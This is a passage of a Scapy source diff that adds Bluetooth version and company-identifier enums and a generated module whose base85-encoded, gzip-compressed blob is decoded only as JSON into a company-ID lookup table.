'1.1', + 0x02: '1.2', + 0x03: '2.0+EDR', + 0x04: '2.1+EDR', + 0x05: '3.0+HS', + 0x06: '4.0', + 0x07: '4.1', + 0x08: '4.2', + 0x09: '5.0', + 0x0a: '5.1', + 0x0b: '5.2', + 0x0c: '5.3', + 0x0d: '5.4', + 0x0e: '6.0', +} + class HCI_Hdr(Packet): name = "HCI header" @@ -1153,9 +1172,13 @@ class EIR_PeripheralConnectionIntervalRange(EIR_Element): class EIR_Manufacturer_Specific_Data(EIR_Element): name = "EIR Manufacturer Specific Data" + deprecated_fields = { + "company_id": ("company_identifier", "2.6.2"), + } fields_desc = [ # https://www.bluetooth.com/specifications/assigned-numbers/company-identifiers - XLEShortField("company_id", None), + LEShortEnumField("company_identifier", None, + BLUETOOTH_CORE_COMPANY_IDENTIFIERS), ] registered_magic_payloads = {} @@ -2445,10 +2468,10 @@ class HCI_Cmd_Complete_Read_Local_Version_Information(Packet): """ name = 'Read Local Version Information' fields_desc = [ - ByteField('hci_version', 0), + ByteEnumField('hci_version', 0, _bluetooth_core_specification_versions), LEShortField('hci_subversion', 0), - ByteField('lmp_version', 0), - LEShortField('company_identifier', 0), + ByteEnumField('lmp_version', 0, _bluetooth_core_specification_versions), + LEShortEnumField('company_identifier', 0, BLUETOOTH_CORE_COMPANY_IDENTIFIERS), LEShortField('lmp_subversion', 0)] diff --git a/scapy/libs/bluetoothids.py b/scapy/libs/bluetoothids.py new file mode 100644 index 00000000000..a4a869520ab --- /dev/null +++ b/scapy/libs/bluetoothids.py @@ -0,0 +1,767 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +# Bluetooth Core Company Identifiers +# +# This file was generated. Its canonical location is +# https://bitbucket.org/bluetooth-SIG/public/src/main/assigned_numbers/company_identifiers/company_identifiers.yaml +""" + +# To quote Python's get-pip: + +# Hi There! +# +# You may be wondering what this giant blob of binary data here is, you might +# even be worried that we're up to something nefarious (good for you for being +# paranoid!). This is a base85 encoding of a zip file, this zip file contains +# a copy of the Bluetooth SID listing of all company identifiers. + +# This file is automatically generated using +# scapy/tools/generate_bluetooth.py + +import gzip +import json +from base64 import b85decode + + +def _d(x: str) -> str: + return { + int(x): y + for x, y in json.loads(gzip.decompress( + b85decode(x.replace("\n", "")) + ).decode()).items() + } + + +DATA = _d(""" +ABzY8*hqM20{@J?TX)+y(k}d0xaMMZvfkLQj+V3UD2bLB9jJ(s9cRrAEx{IA6shLHvGRRCepjIiBp}) +8Su@?~@FcPT6zZwNQ~%$;+PAlzfBj$QU-vSXY2u8sv^+X~vbp}(7Y9$a@uU~a!b@IcB19&W7iT&h@aY +zwo_N!#w{(VCx!E5?o)==XOXS{hM|@QiuUci|cbYka^l*%llapU(*Qx%M243JEj?SGd96!$@5j)e>kk +0nL;@MH0K1Fa;CVOWn^CFW^Wr43eNV6k9r+1524n$I9=|N<|8K?0UU$}pLuP^E0C86Bx$_Vb=Maj!9g +)8PFO+?|W@YT~eeUT!ECtrV=7F&JijS@wapPZS9@)9187dXZhUA*G4{2Lz~ii6yw$+p}S@YSDw$mk%F +&lk5S;RkasT(|?zS$Tu;JeUR}-wT~ji`C<2Lkwytmg#;ELO94mZ27nvgT9b|;g^O-H9~_-L`pi<2c0f +{T8+va2K6Z|oKH#=zjtZ*S>1DSwHl(wG)|;3J#N&{{PbrtZ#i@4b7ygX6&3JQ; +4(7F`BM|OH@*Dnf!tyAxFfEhqxg6lb_z +pDyaw1MK%v|$PB<^78&2d!D<#D5=?heO8=Pr{X*~TYllU~=)RniS!VannJO*1tdd``)7kqPfLDU6@&D +rw$jBHu+v5Rc1;Nn#+U%<+d`3^{d`oQ6Uiod~`WC4V#?ccX>z6NNEMNzCapJfRSAEMG*j5imR-$)>BM +xryYfFn?4@%pZF0Y8lM^iJpz{XY?dNQ=Ie~=j)XqXOT#f*zsbqhsBB70p|u^p=3FhMYP%B?An&Nyg_o +_-=#dlvMHSK1X|^Az9hR!$o)*d?22E}32sf&SDN?rCl==SeF{sO<7dO!RYNlMgSj(W2I~b#c|PEC9W^ +ZOeBcbm{@it@{>)!_yed0taHit-DG|;(bPYju)aaL-h +(#>ojM5cHMI)pbgipL58=x7Yo+n1F0Zdv12ru{fX*~}%AHT+$!Dh;-HsZUAeK*AR8N|Y8jF$Vj6HX{8 +V}s%nN~97qNG1|7mKOe51lZ$TRq_Ai=}_>uDmljDFLsRpyif>z&_Vj0v?MfE_NGS?8bmu(rVw5L}Rf< +ar+6(6a2g)H&;cQw8zq)!RywutgS@-ElN^&=(9Pa+e)nc>DpT?gL|0S%b&GC+DeL{NOBQn&H`q4CBe3 +mpqqsA(LYx3EhW}z=y+3auv+ +?qiwl%ELvQB8=z4q^Ea^e`{us8DU}vy;W5*5on3C$iUBFD7JN>CYpYRDK)Q9p-g64tE)DKqG@ADNb+2 +~i4ZBa99lxEoQStZ=>ot9e48E($?F5Xh|MY97I+1k#BV7#&O@5*bK_&0WO}49dxzpxZs3cnDb%D1>HqMi&dP@u +9$q^htkoHaIT)hcN$dg3v`I=~iur$YDVnog?<;|)7%0`#W#Y}F0p^h|{W} +{;*yPxUb@=t56(YE&5e)=c}Xkotmki6+P$W%_Z64Y(2l^Sd(h-@dKEi4sfBA*!y4JF!Puyp6n>~3^jO +|9NnCBp%#Wsu8y2F6NgSY2#%^}Z@`elH~~r96iL$K7=(a`}=NQ@!_933Dl8neS{<*pyB0tCH;~6&a}E +h)q3fZTG$^(N4k42E}QrD_Q?o$J)&LUI^RAqosw+?X34ziTK{1KTe&QyIMIjZ|K{*aqlbbUh*kV?GIB +@9*w+#;{q^{o5(t=#5*e40LBReqcD@3EESbjvQ3ZPtrGlPEl=Z7x3|``nR|f;yWNNLrgy6({!>AaaEF +Klr|1&omMgQh){3TGWZbWYVlLj6;_%w6R9d)4xXuL&B6^AtLC7TfeDQ^3?79R04tAiKyM%@8^kMu!W5fOoI_ugV!ya1$Sq_sYhIfC?z +$Vz%bBj>k7>qv0L!@^+)i!jG@ZBIw^Lz_yi4Q6%J-`fu`S)hL93i$4z+ha6EBG^xUY?@zpm&HK;j^K@ +QE@jZ3;>LTJ)C@@65=6_Lkdq +5|!nf!cB^QdVN9YSJuRE|FhVIHWhLRB2&vFCvpeUr{zJc!IQ!O&_+##&4pe%5xoqh%&NME4D^Z+IstP +NX&gud<~L_;TK*U@o8U+d&Kjq#fYU@OGJagQONR)Xq}2QfS}Ki3XmT!+e+5Xp-HCX^N|R+pP*k1!f+U +!ut1MQcIVf+Q3cuDr)3p!+l{jHO9fY>WU+!Q9`5e$}{Z56VP}iyu}J9Kw8kL2m`vpvlW$QDSNtTccN4 +YqS3Wv(tPD^4`owXhPM)N3aR~B})Oo&iJK0r-yRKc&&ODLRP`l56$hum^uW +jzWWm}9p>H-;{EVCyDMC)aVzf!4C(r_swFwZ00+GIo_zk^jTN! +=u(X^Vubio~`nrj4>++>@HUpegLZU#!k(0~M(7Eu!AYHKjWWddbmxCuFhn<#n8QYTpRQ8MVoRzBhEF_ +$l)rNJ&s!30&iPjyC#aG&l|I45KC4DIN9Snyv!$r!&*Tepm&M7~+SLXwKmrhel?N+dJ?{%mNqDkD5Jg +1Pj&($a)<{4E+bV5Ha2Cxo+%WCH5|CT%qb&6glpV9KEMH`D=g!IP>nL>wyD~OlNYqy!3=*X@W7cV7F +TnWAdmkY)Wr`Iwi~~$WE}onUID^$);#wJ_P78nl`k3%lGxZM3FLeO$-d+zz6P2ITLVa5I^Xz(2m(Dz) +J(P52=CzLRK^jTH-vTWVb;CC+GhRLU>opQl!`C-j`A1-b=_2n^rP)`GktC%#ed6K}l8SCMO;E;bkyPmrJO4HmB>bdjogYfL}T{n8GxFNJNE+wuxN19G=9fh*Snt;&M1(+}m1`|W91c64u#7Dql +{6dp(wb;ZMmwJF1g<%9keVo5E@9f1HYUa~~eU{}BUNz!Fv~!Q$1uDECn1<$f6Wp0zudc_})_So%jPQ? +pkOvrko42e5)hU|- +j})C~ikxRBPQB%A|Sa8jI%(r73A +x-yy$xPitkZ4-IDysxO1>6XHMuZC*I2 +E`_;&e(;Rjx&^@q*Q`;eULr^OW*7Msh{Rs0w6aja0X?pSsU9XnivLv7BK-6qbGVwl)y9t#c)EAz{on^5Aw?0zhbSw|=j ++q~&{j`5A0tobFZo<3pTDv#jZK}tVKvl`P~r;i{Chjta6`}ta97AKptNwjL}VZ-wj_k1MhG#5ptg;J1 +e0Kwc?2U;z)QyYW*5PGJ^!a{G@dt^1M^J$0t28xjkZ@BO@}Azr?6+g%q8e^6=zi*fJ$D3qQbemSUmXQ +*f>Fg6xl(7eDn0V_=U?WuQrD`=3SmJ)c}l@4Qhb-Js<9vzB6`y`|h*~3$hS75EX+dz1j&tKo{$afEFN +=L-c0v6V+@Y;1$dtcu5e@n)_fTf|WQPdUN>MgYo#2m=fVmLGf3Oj62&CP`@_4N0xiNbQk}aZQvs;>|^o +Bs#T)Y*^J!G9~QJi@EEdY6h3(p%mGjC-?YW0N_9Iaf+a?glqC|>}h#(!AW1l$0RZe{NLl<^jKiptY?L +$GZYI{WCaXx{@M;(UrZ1Rv`V{Aa$FT&4ahr~*GX1j_D$QNVvEq<@EI=gOO4p!b_!DNA0HwzedI)(6p( +J;6tnJim6Et*h>ByXSmgdwp+U7%NS7G#^bb@(ls6Dh@F8M?NK7n4#|*jyy?N_0yF10}UwjMomx*$1Ht +K4Lv{@483GmKhw9fotd*NZU}Bw1EvfdSS^^Qq8F|`sR@a>TdyjP{|4bNOSzPW6R#+Q=~Ld=b53$ZvhT3tdPM(`$On@f@pw%x1c3Vvz;+LXyJRYlNdYr`15;qm~e)B5bjOs>Q +6WI=$GR%FD(>rT*6*k5dXGx2H{|JiPX-Y+O_oF&s~%%N7+B#r$%sA7MQ(aTjO0qeM5l>FLzP75rySj? +-J-+dfo&_88L0WOLPhF?S@%;wDDLyoCN+Jz=+5&-SCJq)G?@fNe~2-chg7M*6Pf!j|EIn@F7h$u-|?{ +NDQkI-5jRc?GhXe5#@wyYm$Dlw83Y4b#TBedKQ4yz&t(}FUp1r7#y@I)T^D)A^?ezHxED!k6l1-MjWLvp2cX*Nf)Ftc|ltsRi$>|S4nl2$aFpNeVt= +2|fw`+Ubre(5`A7a!lfx6nznTM50?}cafW0$bqD*c_-$$4GEbMAUI4whH$6z0MgCyRc+rhkDg?HpkRf +Jx{?uNVyiJ22nNougcyhx8Rs7t+~h(O>e5v%OAr_H~!g;KUud&YkC<%Zbq74AX=~q!gYxKRF|DF!rX? +cd~uEgb+trlx%kLc&^|+RXG=SfUip+66~g=_;7v^a)gmzgCO*NXZXgtgdqE#w}7=8@-a0Ali+)RnV#o +)GTpYBY92;Pxx;iYa^Lwn(%*0novU66y2>zVyMzb>jHwExN9_qkxX=T{$WkQuH(B@BPB?RyD_e84Ig# +t$y@Qv&(w5zUT?ktSHWwJc*_b+4Co2}1?Fk0Gt3R28m8m_jga$`muoxRw24O-M_E)q)VPkkZ^3eoqqu^hzWV{|&@AzuN|12;FuQt)iZhtdWef-l)P2`d?-C%KxuB<6Tm%X4L~Ml%s3hXjZ{BTksOe4SRG;yOHzkj +eNY7lY9Qp1tM5JF)iS5-WFixxzVO4tF36mH80IB&_iYcdA0xLK#qRSM!E@Mac&Ks>UwbJ{(_7|8=XKE +AzlEc5sV`V=RY`lY|zK>-U0My1lU(>S`|I!1K1kH!q-n7APmtf<=PG<2jO=CW&qzq%^@zZVZC^~_~wI +OPPhko)Z^C%WDmEH?}cL@xR#apBz&LwDvCEzuc@5CB{z~RbYt!IwA9{PbL5+z!UeiZ4E50PtrHQ$>&3N8H+2aAd4R}@l#kd3vDf#e7?}KUB6SG$!Plu`AEkjRozWrC=gRC?6l0Qxo?aaSdGqu& +eHPilDJUkkF>meE2GQnXnsf-%sZ?I~!X4IONVjlSCETC$!6v`VONPG3O7tBtSuqlhSVu_}22{I7yDA1%)gp|b(TW6j5r1L6Aa+WD65l3az?>kX|#K&%R+j1l6Omp{U5sz +Z=#?gf)zjL!dX<;~pCOunvTksX3s<1!(Cx{fX4+wqLhvgmQtGJ|z`s->?{)r-iK)7l7mb$V=;!d5VGA +KsZp1fTi>#P{X|un?d4I5{6(cL}E@CLO>Xb1*`3!Be5L +4`{oBQ5}%m!O(6Uf=8kEaOJI+!ElLDifRwlMs9~-(n{n->V)3;{@Nk5cvMRK3AZ_Ie2u0Z^zLXsFHQkK<)3*iF;t3x;nFvfNk{jLh%Is};5dkV-S6 +G|)9V@@FH-oN)%;n6pD;m*yuO?U}RX5G>{ed~7N6 +UGx+S=ML;~XBNH4jrIG4-skI?XV$xR2;RuFfN_y&P6nv8Dhb?pQTA-RdZ>iUTx^7LCU78&%w^9=2V}Y +fs6fX!AQq=NrsOKeVpyb`eP!0o?-x!#m~t9$hhWY$P2md63b$S7d=1I*aqiB7A5QqcEW`GVSzdy;&n% +tl=zv!QYj_czRNh=&C18o7&2H}aML3g4S{{lHqZ)tdxJy{SXZ~2zPuwA(6BbbcgGy7lQbvS!`coJ7)j +oX2+*>^a%L%OJC8enVQ1{(;tD-uDiN@#*k()hkQ&mIX~hArYadK4huo;^CCbG2e)oXu +GbI*Mg!QEq-KF9dXAB0Y_$YT_V+I{M1dkSQVPq(CLPanKUtps&Gzx*Ch0LvVC398~Q1R$)D!lR6ZiIVC|nv^5-oM9>}8hup-n8F +Y8B}e;LZdVU?8y5Jh&fUReqIK7A +2!UaO-@H?#>hP1jhp>YB-qZ30eD82_9hVCcJ;frQQi{c`ot5RjT;3Q~wZ0!nwb_N_LdD%kDw;= +P&DCR9bwMym`=7wa@7FrPM4m~MQCs$4{7nX_#IQ$PH%8>mffI`v21e6%_bidCwhO(<%e$XCpB-9}qyk +)roGPmcUg%+P)~aAQ%aJoOZCs`Cz=XEbBJm +rfKwckj`oci|Qy!MB-ICQY{L?QWQ-xumsGW=uiXRHo+=)`-)qoRXOJ#kFnk!%p2I(l*UxTWQ-Fbt!K!BC__U_w|2Mz%W|cm7#3{Vc{v+r$=cDpTO0f7 +p@eyLx2?r3I$kX6i2n +SQ6Ir6AYlCj|e%rdw5<5mSC)JXmE9^vWVV~qP7V=g~upkRn*bd9x$^#tF-MiIv49-CF}&2=grP7Y=t*Wvtp*oAOQ|a4s4^@8Om@^BZELL&mg?icQuUeR* +X3z#F5!yyC5F3ebHCj-sy1d|k`-XYIPU8He`f>dTLe1kLB_e36M?3Q=Pf)oEf^xIcH9+tQWFX6*I8~{Z`S(OqzP>TMg1 +Uj`caH(8uc@vvrMJIolQn&sQ{z>hXu6T%u%5#)s*4QhpEh^A{d2+u}A=ChK9*X=LFFi!Zm~YYiGV*`YQ9$pYSQFiHTB4UR4c4FyL5ZkVj}1>b{`)w-c)A-m^%hxo`vU*lyTy0pCacQR@o~51z*##DtRB%@+JK^`>#!a +XyuNavA6b?)m}$1XtsI4Yz)iKW2zWJLhb>fgvG+9*CN55;Q9Fq3-pncN!39Wh*xUijYM|9iCInE7U7~ +*B!9s-+?Bgr$J$#2f&gdSqpfop=Wl7&iWjiz`(XFT;vJHQ79pYgV95D|=9F!HwTYDw#6GU)*4}1Y+bz +OFOD_Z)EVP5y#unK6%9+{n*=9Sl-i+cV#~efYdR?>#2B|{79NA{#t+ugj_k4@+&_fzOJ4C&vYx`SVxF +yj;>_ip2fOWTqMlP7``Hqw%pP@}Y`pr&Pqri$)REyBicpNyN##JK6KPEW0n4Y3MLNu>Tojh_jOCoMq#A=6c#4>J8)@War#go(UEEQue{n +LHQ#5JE+uM)Q;_c!I^?^SentEka2-8pD^EvZYxFxjYaS{M*Ulkjo!tN0*5jHs#?-WwgBP)MBkGtgTn* +FzboqRp@!<4qRm1s8$f+tYrk_tXxiD^QZWKK1*r?ek?ymLeYc`VldGPah}v+N>IuAuLuX*Jj|JX{#*f +i@(R4~$ZmCX{Iv?U^YL4*qdJQ7DwI}->uAAnna_iJK1i;}j!&X~j{vNHnn)%ND-->?a=!d< +%mZJQD;f?#8Bxn8Z$aG>oJY<2A1okf~s{&e!EdB8VvWKg`GWemML6S)cuj23IX6EwR=t{SC<;X$_EYc +udwQHc6zj~5d9E5MA(N}1yiCL%XyDuJ>Y`egb(CUsRaaO#i7D{`qDmII-*nfrb1t&BNC0PP28elREMi +)q|T7=o=tCf=@+mMM1dDo!*( +px|EEZRq->ecnOcqZ?f?!F-64Xd4+5fuL +DGdc&j$}2$DVj_*}( +KP70Q#*XvBDCg?e*XO71dCN*YMYNd;w=tQi8nBcEatx!VYLSlqhsnH6C7Iv)xJw)?f`5Bco2&@&#IF@ +NN#8mhI0?fCu2@>0&X++2NG|+2me|PE_5k2yKQRi^?bg?Nu^rPHaHt714I2X$+1P?47SCgj}FVLbJ)V +^PfY@2%M^=Ja5B>dW*F&B0%iRmn4x|P?i^(@hI~>8sQ9=napd!59kv|bGs&sS!}?K*uqZb(Wv9d+B&qWC}R +Up<}a;{9o8Y-vrVhKKhEmIJW8S4&uLidl3SOkpL=y_HUXZgQd3)L;GNU_St<1A5f*YvXsw-U1E%*JZ( +Vlb{qPz)qA25MD2@r~L9vDu{J&D(7Mhz`w?+O+ru)?j%6N;ky387P)W%MDCGrQ4>h9es2yci4?0d`Mcp%MDZJ>~kZnp~+l=bI%(&x=urTS(}8dmOCL1wE5~y$5dJbs(#9(P^?Jx>>xZf +miO{^g^H{jyG*H;T1Uxc9S%G@F4iPaq+o<=O;W-`{vlQQ^6!U`nz{fg%Jy@az&Zd}fz!z75z!uUI3tS?v5x)Q|E^9MHE6g=2(qw<%Gm~^)R)17A3!svFN`mg=%&*YYP~P0AYTCSy|$K;C*rW5n|&PzK +$HPb1>?WjlB|oo9k6G*z^$IkoMO)gOCrHVwjEwOREG69{morxCjMR5cqN%BK$KBmVVzga8a|(YnOhuq +VhL~f-q0tn@)#b=#S>+DN=&jLA_X|_X+L{;waDMvqYNC6H+g+44A@V*|+^KT9k}?;7yV=m!>&GfM?~8 +6p@1sUYi7Z<_J=Lo0^heiL>-nR?GJi3?}orRF9kH2f0boEok|BK0&K=C$dAjPm?RMur3VzCPAD2v`IL|dlM*PUVBCkT$5l8*3mhSGB4AoDE+T0ikbv@CSaBZ0esGakCJnA1K29n&fkV~+-(`F!siZYv_ut_N9r`VStx?N#rnD0#(XCz-D%Ck6g-q!PrsRRL^=X#Jv1hdyOZ8f=X)VHnWC#AVp1u*zOln10L$)8If-R76KmbJgs%sFwLn8U$h7EdH>*xj|S4=EgD +@&-f5?NF0)MrW&HuOSQqE<#FP9XJy0<0w^Q#8lirz_xc7Qkvmv8MUh&+-PClhU;#$2xW3sZV*e&pVx< +hc8-y=LX@gN# +bybtf7{r9Z73hR2d%HmhV)os&hns-I5*I<8s>M51gMb3sTG7>j5n`3m(_6%f(vde(;BoiZaO+3^%`y9-I9~Q`dmQe@)Y +qU>}OFCpt&e9?L74OoRZlK!rv8G^R9kh!v0;S5PNex2oE5Oj=_c9V7@%e!SDN^F3~+4>b +xJK>;%*3_H@y?<9|1vO+h_>7&swpQ>*hdtOj!>DCUU*X^iXfBUpe-85vzDov51PoRM>!4S_ezq&TOdgXAK +F*ywb0-!8CWT_#=vxR9W)lRT~2gn&07r|aYjwhV7vfxxznhb9Qhp81f}wKd60EX%_`c^woHS7!vo +9>@6k~?m5U`-t9`0?gKdVB24RUuK(zdKMh;o}9NP>CjW!qTZ@KWw*kZUcXzVVp`pdwd8Y-ROf*WO9VK +i}Qv~`a{*z)^PE=@r(?;RRbfPLq-4kx&9@6Yd$@>SPAxbvYdw7{UqM?^r4v&Kw*@>eSVXjC@{WvHffP +9FqP>|}YM{1{`?C%BPpw@MfMM%r4donoWKaVh1Hcfo8q6=XtcIT7mcho1gB6{8|OpYy2L{@?LKS}#iT +6Xv^-UDhD5F`eR#Isv!($yU{IB)4NZjh0Rs+NVy=ESU{vJ2=IllbxK^Fad}m=mX_mH%glt1R=nBhBrs +w)<-LqUbvla}3l`&@tMtDi_K#c2rn0qOKHbEkbffSXeuR&m8>AAy4EDCeN$zz4+8iW$Y{tP?U`ObuWR1I#Qk#bsE?1J6W`p +*5I%K>4%I_ego(w~ +x`N|MYIlEuSzc{u5gP|^wr#fe%%bE?CN`J#Ia?cz2HZ(dYlHrJ^EHTx#9yrf(Bh-V;2ht=B^*aTL`)p +3Kk=5qR&)UISg{>AM?v&xvwJSh!#(ZwLalw?aKmyt!^Nbzl4pr@F)vwU{Qz5cF+5_E(h#A}=X^J~fU; +<&!2`_mkyou6IHQD!`3^sLzI=jRylRFB7m)svd5#5pmj%#p1)SscrJhx?Q-8lkb%pPqDVo*rDNcM +|UPkHTz_a_vn0G +5$PWZCJnd|KAT?n&`gxW37Q%vA=kN4}dLRii3>2CKwV6XeH2dL> +fTur*B@g-Qx|e?*+{-bq^``*Wy-eba3~9E8Kuj&^p|VewwbA(n62Q4H}&s4K19(Wm`PSj44i0jn)e31 ++5xXB!X9@RKmm0z#gZQ5mWK9Oy=0(BI2_jc%H3bVs>f$#)x+90CC~)G&Ii3x;96R>QL;a!s)*`>gc`1 +)(oNr+4jmnCs1`M$4p+WmYQQHZ(ENNp>DxME<4XB0tBr>c$O=9S7Q+MkE$i{%9IfxH?%Lcp7x0E#ceJ +!XJ6uF=P9gS|!>9F?KtwF#Cs{bba8?-#gd4sMYbuumnD1r|LACZ;y)*jJSZ+VotOO^piB~~gGR71Uu#+{eJ4~iA?a)Vi{aj +KdEAVUn;#n09XX|sj4b~IetWfLvebO`kx$?z +qZxc(JJfX2QC9dM4FVRNtxRN~nWJMe;DgNiML;T7CPD<6z&=L(~@xCcJv7ZgHpA?XBX4xw +W~%>`oSn+Up{@r*+G01G=td;)2Qvje7Ena&kRkZV3_n^!-J(G;f({dp&pV6tCN3t=(@qvkPlT&eGK29 +3>Hf{qtL1OCyj0r^q=wSX6ga!*R>CGw2Z>M{#Wan68J-`{~nlU;gI9P2!3Tt8#5KX${U(RV)ZMNwwO% +W#a7pX&n99iwlBixPXZ+f-^jK%g6>-+vO^~B`DLE+16QtcFnCjyLMf1onU8Nqa>5urP;?s(r^{0Zw&m +Ey8>-+j~oYcm7u^Ekf$N^`L8-E0ub}fkSHOSF?KABb0)(zm)NZ)07$mW-Kp3e%vUA60$3=(3a^ZM;v& +mPq%Y{P3u3zRXC7z=Equl*>Gnk!T9knhbTN=?!|?}oiAWk-ho?FCsfa)UB(-_ +%Yof(-Y|Y|8L3RctZBP4K3P^1s04cM}gGmK=cV|-``>DQu|o!?&u)WJ}Hx=p0^6aEm`(jgrxDsu5n+9v +HS0S`$l@&jihT*WDBa2zQ{z8l-&Edi0JD(i(K+tGYJF!3W8uPDPUM+ZUSJaw+<<9Z6d! +6bBS^mR)>W#|pu)p&|Iqy&a;38(;Y01&_SmWC;G+h(pQEX`Wpfr7hi&(Z`ut)Vybf{*Asn;ywfot +SHVZf1`HHCJ|80UBrRWd=&3ABSY0i9h9WAl=%F&L_0P1}J%E0_SHl6PX~^Ib3Ljm27|5!HMsP&4fa9o +H+=}&2aEt>?=0IlySW}izNQ-xj9;0Fx8*Oc@?< +3seqa|s)u}O!6GIqj3vY?y1=Z5~!3(gY#>xs)u&v7I(<@347(yd39P|4jo^jt;oW$i+QNj&)O=#o02Q +jdgBRNsb+ngTe>;>VIR2`KvI?X?g7QRxw=xQF)u^j9A0vG09l9q^ +VWQD)vj^K*?YB;4UW65I`ytrQpyiXN-r5Zpk94K6`py(I0-sWm}Qe2z+Mr~dMcvJ6g9S~#+^elY@)aH +7eTaL4!$T}t6PW`}$;evcqWnUuzda%&!U>Q{}J`9!a7Nibt=(Bn7>*nCR>qS(m^P>->$d(7^P^M9y%r +m2GAKfLEHxANPFEIn1t(#}y$kMPD2_MkY*ogtCW=EQZWpVT7$Hh5BW#?5FB2)E=(^SmarfTIl^d45G2 +2U?0fZi_0g&0uU9H$ATFNVkGGdJK{FY*&IS4}hhvt(o8J-Dvvu-_9h8w*p&d;UoTCgYzC^km(idW-!G +gQ3&&A2&kQq9N9S9)@3yyp`tdSdW0&t8fg(FMR};zL2feu!qqg*!u#6AbY6uF7ttDx$|65zRJyzp<+C +s#bB{B%+>xSboR5Y8X)FhZsm^;hI^}tb;1pl&MQ6&xNy_VR2mU2m?h)*m1bue}d!xG^dCu%^bbaRD?A +>rNXI>&h`x|+w&yz8Y{jWz@WL~~vcOpJSEV{XZj`CG*OW4#6UmWh)Ufs~qki}Ui0Wc#c@9z(MJq^Myv +5k=|SL+4>Dia}&GC5yP1XQa12OE5S;9l)@nL95_L|&&<>*w@zYoPR4NCUC=7^eh7e?8+PMC=S-B@%Oq +beT{C^#_Iv&bNZ%BSs7Jd)jt)3NZKI%H$9FgrE#UWb_7FnPqU2(xlz>)ENW3oVoLPwbr}L5%si3`VWI +M}7=-M)wjAQ;&mfcOYUqZxvM2bWSS9+>?wbiGX~$Vj`LC7l`#O@B(W+ +jDJ0icVq8A5NSh3S=HO7z;hWUZ6CDS|FBkbbEU?>;ww(*2Z$TtWpA$dA|gb90uW&HWvTRKa3K03=uh6 +`>PY;1O`3kPJc&D|I7OHsqbYQxtK!yY$4RR%7bJEmAU=;Gu5YW2cRPs8_1h2T891(6bfOIB1B9Ir~kI +6*jb#uHnG5VUcVU5UAG*a%*=tLBpp-FT!#p8NOn!dpFtH?ZQ1_+-8n;hLWU#+xc-O!s?_Adc#CjUcCb +*($VxNyr=tk@Yie%7%56e?+Om*LN6}sHWJJZNA4#&9EpY9gbG +gZhEbF_gE^srPu)~S#be~4K#%l0WyNq|mvgnn7Ez|T{n;-;eCqCyyL71>9D$r}PL?hho*wtAMqsaqzbt=Xz=OW}s_3-KOP`-OA;ebZy^nZYtp) +$V#J-1MptGIoEczL&7dxAKs_6D_={Qo68K)0QcrmH-BY|IY1yGwcJ0#i{yt8%&*uzE|6`enSvsvR+Tz +`M1YlqI}1OLbxH+u}JrrJkN)yOfWtjj-Wq+sV^M)rxx3+V%IB>NOqITk{j!_^sL3+32vgPGsAWbl~)o%zdAf9|louQ1Lz}Voa$fU=D+R%^6)OmQP&2}w!t~19DD13m|B=U2<=i|L$ +=akpgIae>dc$v&Sybzr`hf_>qPx +T4Hd9w*rkeMN@D=d$v-l9!PVRq>MoY{)t~YTnHn!hh6$LJrw1%-;%SC?D0P2^TEB4mR&<2vmA#nm!5a +b<_i9Cpx_zT@0WId`fN-QqCj=*(Iv?nPD3dGNT|RFmxQ+)`Rch-;8wcTxcIeme%8cUjMeL<{mD|Wf{5 +LI56V5j~gLeB}v+ai4$)t4Rr0U|0v($8B;r+NAS%MoQ5A*k_sffPGb{0Is1dR5eyo*0IgEGd6$+*O`s +#i(S8~Q;qDql~GXGnbD^G?n6C8|NIvG56oi~w%MBK=VK9BY9MnKC;JN5~CRBv04g${$QT;&#zH1!0hW +T0TEVh$f;Z=M%St`D}e5VUAY!wg(2U6C^4~X^5RuyhanWMVAw2Fbxbp!s7OHX)yiJM)V_DIQ~8Ft^_?EqeHZdF6Bn(;{hEun>a1EANlic8Vwz}Mz +JuWa#=nwkr(6ad0*dyPT$V#9c?R&L6Lx-;OTXg!801u^rNzRKy$#fqn#ix&%vx;vQ36 +^W0?8t3OM7Yo6qH?M&$sNO2eb)r1ewI-V~)7Z#EZP;?24c!wwKjAxm-UBV(NVrKVAgj2NFL~k&=j49a +VmM*Z*XA;wxh}YfTyz1xE)WbNxVW#pq%3JUOcHa9TrlD4Yz*$=-BZs$3SOg6JAD)?&*(JyUKi@eh3W8 +^$8yr^(qD$Cgc*;M{sqAv}1W{gG=6sBH=XKv*t}mxFVUDT)!=Ju$lAO?KOdI6+*|w&C0t_8(QnTo#+p +}Yuk8&$jdi5V-_|@oe{KUsRdo#bJOF-ow-^aYY9&Zkq3jUP4(qCd%Za&05yv?q7rL+dq-Cq9~VG<0Te5jK+zLA2Zv=wiBj97C5f3-f>LX1I +_Tldm@wkBKGuDp4S6mS0fH2rWjEz9fR+DrlLGV_%;4?$-S&Sl+Y7I77Ea5v{3$oeY@i2xR^)500MoU2 +7HVL#$k<%h{$T{}bTCyXWii!IL6hcy&k!YgjM6_}ZCO=m(b!K~tTH@m8yNtZy3;;bA+2Gr|zI3g+}mf +9O+ZX-TVE{1P2S2rbqV#$28#>EVrd +Vw=`!FnQUXHh+ovz@VHUmcNMycUM3*d=r_iJr=QC-?Ft!e*h)*qwVzPA%+eM1o7Yxb*LI36`jN1S8F> +fH|-hVYNsJf84Ej>Sb`Oqa>8qL-`r)e5^_S9?rL*CB239)8}z)NB +$LKp;kaFG(&x9QNj;-Y~XTv$1-&U*(}!YAC}2J@C7Y{DEAopan*d6vD@w +i+{2R5d(xvKEcN~&IYGEPc6joPb-5BHJ*7pV4^i2JyW}n-4s7qM8Eo^O6AYOS#2NTw_vh4w{| +aHVdi3!uKn!>3tsHj_GZvdxFA;I@L&>3!PetN_;DUggKb#BSmwi7p#6bWAOHYfjz}9E7KE;&32Sq2QQ +n^(jkD}?QR;`}%7!}9l3LYD-e(z7ch5L9`A;FWC)4X<=L5Q`UhKe9;f@Xk9oY*5to-sEFsC+A92{R3@ +IvArw_@p1B*!f7!`O(P@5)n8)yGBFH*~orQ*y0(oz*8Op9s0En`in>k+P4h?giY^N;rK4i~tu(V!R^q%qEOX~jfx%?P4re}_QG0^@d5m7;RY^)oBW`p0{-DLWd2 +LkMK}xET9>C+&WzL!p%3}2Ae2g&;0&~Puocz(%s2`8D~@AOn|x2G +y+p~DsIp8pN~K~+iNy*Ks;Q_n)wog1#QX1AV~?9hNwJ6z@BtA3Cfch|FVP(3!R(;Yjy`eV5EkwAl23B +eC!SATfh#xr`I-HOdgzvpXhY4rWXY`4`Bx!y|{?H-(F-cF+JJre^PPi(-+z-y8LLI^#k 